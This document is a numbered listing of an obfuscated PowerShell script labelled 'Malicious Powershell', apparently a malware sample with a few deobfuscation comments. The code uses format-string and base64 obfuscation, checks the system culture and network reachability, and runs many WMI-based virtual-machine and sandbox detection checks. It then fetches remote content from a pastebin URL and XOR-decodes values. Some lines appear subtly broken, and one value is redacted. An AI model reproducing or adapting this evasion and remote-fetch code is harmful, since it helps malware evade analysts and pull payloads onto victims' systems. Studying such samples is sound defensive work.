Malicious Powershell

1. $webClientObj = New-Object System.Net.WebClient
2. $cultureInfoObj = Get-Culture | Out-String
3. $utfEnc = [System.Text.Encoding]::UTF8
4. $parameter1 = ("{0}{2}{1}"-f'RhZH','g=','UB')   # "{0}{2}{1}"-f'RhZH','g=','UB' -> RhZHUBg= (base64 encoded)
5. $parameter2 = ("{2}{1}{0}"-f '=','CxY','RBYL')
6. $parameter3 = ("{2}{0}{1}"-f 'EQB','xE=','SB')
7. $parameter4 = ("{1}{2}{0}"-f '=','H','0cLUEc')
8. $parameter5 = ("{0}{1}"-f 'FxEQDB','M=')
9. ${ilLLLiiiLILililIli} = $utfEnc.GetString([System.Convert]::FromBase64String($parameter2))
10. ${LlliIiLIlIilLiiIlLL} = $utfEnc.GetString([System.Convert]::FromBase64String($parameter1))
11. ${iiLIiIliliILlIlLIiiLL} = $utfEnc.GetString([System.Convert]::FromBase64String($parameter3))
12. ${illlIillIllIIIiIl} = $utfEnc.GetString([System.Convert]::FromBase64String($parameter5))
13. ${IlllliiIlIliLllIiIiIIl} = $utfEnc.GetString([System.Convert]::FromBase64String($parameter4))
14. $parameter2Arr = $utfEnc.GetBytes(${illLliIILilILilIli})
15. ${ilLLIiILiLLiiLLlll} = $utfEnc.GetBytes($parameter1)
16. ${LlLIIiLiIilllII} = $utfEnc.GetBytes($parameter4)
17. ${ILLlIIiIlliLlLlIi} = $utfEnc.GetBytes($parameter3)
18. ${ilIlILLLLiIiiLiIIlLl} = $utfEnc.GetBytes($parameter5)
19. $jfhArr = $utfEnc.GetBytes("jfh")
20.  
21. startTime = (Get-Date).Millisecond
22.  
23. IF ($webClientObj.DownloadString(("{6}{3}{0}{4}{1}{2}{5}" -f'tp:','/api.w','ipmani','t','/','a.com','h'))){  # http://api.wipmania.com
24.     Exit
25. }
26.  
27. $endTime = (Get-Date).Millisecond
28. $duration = ($endTime - startTime)   # measure how long it takes to get the web page
29. IF($duration -gt 300){
30.     Write-Host ("{1}{0}{2}{3}"-f 'ad ','B','t','iming.')   # bad timing
31. } ELSE {}
32.  
33. # Seltsam
34. $targetCulture = 1961 - 930   # german
35.  
36. IF($cultureInfoObj -match $targetCulture){${ililiLilILIIlllILIIiIlIillIILILLlLiI} = $(for (${I}=0; ${i} -lt $parameter2Arr.length;){
37.     for (${J}=0; ${J} -lt $jfhArr.length; ${J}++) {
38.         $parameter2Arr[${i}] -bxor $jfhArr[${J}]
39.         ${I}++
40.         if (${i} -ge $parameter2Arr.length) {
41.             ${j} = $jfhArr.length
42.         }
43.     }
44. })} ELSE {${ILILILIlILiiLLlILiIIilIILliiLiLLLlII} = $(for (${i}=0; ${I} -lt ${LLLiiILIiiLllII}.length;){
45.     for (${j}=0; ${j} -lt $jfhArr.length; ${J}++) {
46.         ${LlliiiLIIILLlII}[${i}] -bxor $jfhArr[${j}]
47.         ${I}++
48.         if (${i} -ge ${llliIiliiILLlIi}.length) {
49.             ${j} = $jfhArr.length
50.         }
51.     }
52. })}
53.  
54.  # VmJveHxWaXJ0dWFsfFZNd2FyZXxWTSB3YXJl  -> Vbox|Virtual|VMware|VM ware
55. $vmSigns = ("{0}{3}{6}{4}{9}{7}{1}{8}{10}{5}{2}"-f'VmJveH','Nd2F','3YXJl','xWa','dWF','TSB','XJ0','FZ','yZX','sf','xW')  
56.  
57.  
58. # select * from win32_pingstatus where address = '8.8.8.8'
59. if (gwmi -query ((("{8}{0}{9}{7}{16}{6}{2}{10}{12}{11}{3}{5}{17}{1}{14}{13}{15}{4}" -f'elect','where ad','win','gstat','8EDz','us','om ','*','s',' ','3','in','2_p',' EDz','dress =','8.8.8.',' fr',' ')).replaCe('EDz',[STRing][CHAR]39))){Exit}
60.  
61. # vm detection
62. IF(((gwmi win32_baseboard).Product) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
63.     ${IllLIIIlILIlililiLiLIiIillLLlIilIllL} = ((("{7}{10}{8}{0}{3}{11}{1}{2}{4}{6}{5}{9}" -f '6','b26x','00b26x14','x00b2','b26','x00b26x','x00b26','b2','b2','00','6x00','6x00')) -REplACe'b26',[CHar]92)
64.     Write-Host ${ILLLIiILIlILilIlILiLIiiILLlLLiiLiLll}
65. } ELSEIF((gwmi win32_pnpentity) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
66.     ${IlIliliLIlIiLLLIliIiiLIILLiIliLLllII} = ((("{10}{2}{9}{7}{0}{3}{8}{4}{1}{5}{6}" -f 'r8x1a','x','00v','v','05vr8','10v','r8x04','8x00v','r8x00vr8x','r','vr8x')).rEPLACE('vr8','\'))
67.     Write-Host ${IlllIlIIiIlLllLIililLLlIiILILIliLiLi}
68. } ELSEIF(((gwmi win32_computersystem).Model) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
69.     ${illLIiilILiLililIliLIiiILLLLlIilIllL} = ((("{5}{3}{4}{2}{1}{6}{0}"-f '00cAMx01','cAM','Mx00','AMx01','cAMx00cA','c','x')).RepLAcE('cAM','\'))
70.     Write-Host ${illLiIiLililiLiLIlILIIiIlLlLliIlillL}
71. } ELSEIF(((gwmi win32_diskdrive).Model) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
72.     ${ILlLILIIiilLLllIIliLLLlIiILiliLiLIli} = ((("{3}{4}{5}{0}{2}{1}{6}" -f '01P9qx01P','P','9qx00','P','9qx0','1P9qxdaP9qx','9qx03'))  -RePlaCe ([CHaR]80+[CHaR]57+[CHaR]113),[CHaR]92)
73.     Write-Host ${IlLliLiiIilllLLiILILLLliIILIlILILIlI}
74. } ELSEIF(((gwmi win32_logicaldisk).VolumeName) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
75.     ${iliLilIlIlIiLLliliIiiLIIllIilillllII} = ((("{5}{4}{2}{0}{1}{3}"-f'0{0}x00{0}x00{0}','x0','0}x0','1','{','{0}x01'))  -f [CHAR]92)
76.     Write-Host ${IlLLIIIlILiLilIlilILiIIiLLLlLIiLiLLl}
77. } ELSEIF(((gwmi win32_bios).Version) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
78.     ${ilLLILiiIiLlllliILiLLLliiIlIlIlIlili} = ((("{0}{5}{2}{6}{1}{4}{3}"-f'{0}x','0','1{','{0}x03','}x00','0','0}xda{0}x01{0}x01{'))-f  [cHar]92)
79.     Write-Host ${illLiLIIIilLLLLIilILLLLIiILiLilililI}
80. } ELSEIF(((gwmi win32_bios).SerialNumber) -eq "0"){
81.     ${IlLlilIIiILLlLLIiLILlLLIIiliLIlILilI} = ((("{8}{7}{0}{3}{2}{5}{9}{6}{1}{4}" -f'YGxda','x','8YGx018Y','8YGx01','03','Gx0','YG','18','8YGx0','08')) -rePLACe  '8YG',[chaR]92)
82.     Write-Host ${ilLlIlIiIILLllLIilillLliiiLILilIlIli}
83. } ELSEIF(((gwmi win32_bios).SMBIOSBIOSVersion) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
84.     ${IllliiilIlililILiLiliiiILLllliiLilLl} = ((("{7}{0}{1}{3}{4}{6}{5}{8}{2}"-f'00ZRC','x00ZRCx00','0','ZRCx00','ZRC','4ZRCx00ZRCx00Z','x1','ZRCx','RCx0')).RePlaCE('ZRC',[StrInG][chAR]92))
85.     Write-Host ${IlLLiiILILiLILiliLILiiiILllLLiiLIlll}
86. } ELSEIF((gwmi win32_systemdriver) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
87.     ${IlllIiiLIlilIlilililIiiIlLLlliIlIlLL} = ((("{7}{5}{3}{2}{4}{1}{0}{6}"-f 'x000zB','B','010zBx000zBx','x','000z','zB','x01','0'))-CrePLACe  ([cHar]48+[cHar]122+[cHar]66),[cHar]92)
88.     Write-Host ${ILLlIIiliLILILIlILIlIIiiLllllIiLiLLL}
89. } ELSEIF((gwmi win32_service) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
90.     ${ILIlIlILiLiILLLILIiIilIIlLIiliLlLLIi} = ((("{7}{0}{4}{5}{10}{2}{8}{6}{3}{9}{1}"-f '}x00','04','0','x05{0}x10{0}','{0}x00{0','}x','0}','{0','}x00{','x','1a{'))-F[chAR]92)
91.     Write-Host ${ILlliLiIIILlllliiLIlLlLiIIlilililILI}
92. } ELSE {
93.  
94.     #https://pastebin.com/raw/VbTHMA0T   --> D4 C3 B2 A1 02 00
95.     ${IlLLiIiLILIlIliLIlILiiiiLLlLlIiLilll} = $webClientObj.DownloadString(("{5}{1}{2}{3}{0}{4}" -f 'w/VbTHMA','tps://pastebi','n.com/','ra','0T','ht'))
96.     ${ILLlILIiiIllllliILILLlliiiliLiLilILI} = ("[REDACTED]")
97.     ${iLLliiLI} = ${iLlLiiiLIlIlIliLiliLIIIIlllLLIiLilLl} + ${ILllIlIIIIlLlllIiLILllLiiIlILIlIlilI} + ${IliLiLILiliiLlliLiiiiLiIllIIlIllLLIi}
98. }